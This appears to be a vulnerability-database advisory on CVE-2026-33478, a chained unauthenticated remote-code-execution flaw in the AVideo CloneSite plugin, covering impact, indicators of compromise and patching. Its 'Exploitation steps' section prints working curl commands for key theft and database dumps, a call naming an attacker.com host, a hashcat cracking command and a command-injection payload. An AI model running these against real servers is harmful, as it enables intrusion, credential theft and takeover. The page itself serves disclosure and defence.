CVE-2026-33478: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-33478 is a critical multi-chain vulnerability in WWBN AVideo (an open-source video platform) that allows a completely unauthenticated attacker to achieve remote code execution via chained flaws in the CloneSite plugin. The vulnerability chain involves clone key disclosure, database dump exposure, weak MD5 password hashing, and OS command injection in rsync command construction. It affects all AVideo versions up to and including 26.0. Disclosed on March 20, 2026, it carries a CVSS v3.1 base score of 10.0 (Critical) (GitHub Advisory).

Technical details

The vulnerability chain consists of four linked weaknesses. First, plugin/CloneSite/clones.json.php exposes clone secret keys with zero authentication (CWE-284 / Improper Access Control). Second, the stolen key can be used to trigger a full mysqldump via cloneServer.json.php, which writes the SQL dump to a web-accessible directory and returns the file path in the JSON response. Third, user passwords in the dump are stored as unsalted MD5 hashes (CWE-916), trivially crackable with tools like hashcat. Fourth, cloneClient.json.php interpolates the videosDir field from the clone server response directly into an rsync shell command without sanitization (CWE-78), enabling OS command injection via shell metacharacters such as $(id > /tmp/pwned). A complete bash PoC with specific curl commands targeting these endpoints is publicly available in the security advisory (GitHub Advisory).

Impact

Successful exploitation results in complete server compromise: an unauthenticated attacker can execute arbitrary OS commands as the web server user, exfiltrate the entire database (including user credentials, video metadata, configurations, and secrets), and recover all user passwords from trivially crackable MD5 hashes. The scope is marked as Changed in CVSS, reflecting that the impact extends beyond the vulnerable component itself. Lateral movement is also possible, as database credentials and SSH credentials stored encrypted in the plugins table may enable access to other connected systems (GitHub Advisory).

Exploitability

A complete, step-by-step bash PoC using curl commands is publicly available in the GitHub security advisory, rated high confidence as a real exploit by Feedly threat intelligence. No authentication or user interaction is required for the primary attack chain. As of the advisory date, there is no confirmed evidence of in-the-wild exploitation, and no threat actor attribution has been reported. The EPSS score is approximately 0.0195 (1.95%), and the vulnerability is not currently listed in the CISA KEV catalog. Nuclei detection templates for this CVE have been added to the ProjectDiscovery nuclei-templates repository, and Qualys scanner (detection ID 5009470) has coverage (GitHub Advisory, Feedly).

Exploitation steps

  1. Reconnaissance: Identify internet-facing AVideo instances running version ≤ 26.0 using Shodan, Censys, or similar tools by searching for AVideo-specific HTTP response signatures.
  2. Clone Key Disclosure: Send an unauthenticated GET request to http://target/plugin/CloneSite/clones.json.php and parse the JSON response to extract the key field: curl -s 'http://target/plugin/CloneSite/clones.json.php' | jq '.data[0].key'
  3. Trigger Database Dump: Use the stolen clone key to call cloneServer.json.php and trigger a mysqldump, then retrieve the returned SQL file path: curl -s "http://target/plugin/CloneSite/cloneServer.json.php" --data "url=http://attacker.com&key=${CLONE_KEY}&useRsync=0" | jq '.sqlFile'
  4. Download and Extract Credentials: Download the SQL dump from the web-accessible path and grep for admin MD5 password hashes: curl -s "http://target/videos/clones/Clone_mysqlDump_<timestamp>.sql" | grep -oP "admin','[a-f0-9]{32}"
  5. Crack MD5 Hash: Use hashcat or an online rainbow table to recover the plaintext admin password from the unsalted MD5 hash: hashcat -m 0 -a 0 <hash> rockyou.txt
  6. Authenticate as Admin: Log in to the AVideo admin panel using the recovered credentials.
  7. Command Injection via Rsync: Configure a malicious clone server that returns a videosDir value containing shell metacharacters (e.g., /tmp$(id > /tmp/pwned)). When AVideo's cloneClient.json.php constructs the rsync command, the injected payload is evaluated by the shell, achieving arbitrary command execution as the web server user (GitHub Advisory).

Indicators of compromise

  • Network: Unauthenticated GET requests to /plugin/CloneSite/clones.json.php; POST requests to /plugin/CloneSite/cloneServer.json.php from unexpected external IPs; outbound connections from the web server to attacker-controlled hosts.
  • File System: Unexpected SQL dump files in the /videos/clones/ web-accessible directory (e.g., Clone_mysqlDump_<timestamp>.sql); new files or web shells written to the web root by the web server process; unexpected files in /tmp/ (e.g., pwned).
  • Logs: Web server access logs showing requests to clones.json.php, cloneServer.json.php, or cloneClient.json.php from external/unknown IPs; PHP error logs showing shell command execution errors or unusual exec() calls.
  • Process: Unusual child processes spawned by the PHP/web server process (e.g., mysqldump, rsync, sshpass, bash, curl, wget); unexpected mysqldump executions not initiated by scheduled backup jobs.

Mitigation and workarounds

The vendor has released a patch via commit c85d076375fab095a14170df7ddb27058134d38c in the AVideo GitHub repository; users should update to any version newer than 26.0 immediately. Key fixes include: adding admin authentication to clones.json.php, moving SQL dumps outside the web root, replacing MD5 with password_hash() (bcrypt/argon2), and sanitizing rsync parameters with escapeshellarg(). As an interim workaround if patching is not immediately possible, restrict network-level access to the AVideo instance and block external access to the /plugin/CloneSite/ directory. After patching, rotate all user passwords and any credentials stored in the AVideo database (GitHub Advisory).

Community reactions

The vulnerability received coverage from security news outlets including SecurityOnline.info, which highlighted it as part of a roundup of critical CVSS 10 vulnerabilities in AVideo. The Hacker Wire published a dedicated technical write-up on the chained CloneSite attack. Bluesky security community accounts shared the advisory shortly after disclosure. ProjectDiscovery added Nuclei detection templates for automated scanning of this vulnerability across multiple template releases. A Medium post by Loginsoft also referenced the vulnerability in the context of CISA KEV alerts and active exploits (SecurityOnline, Hacker Wire).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management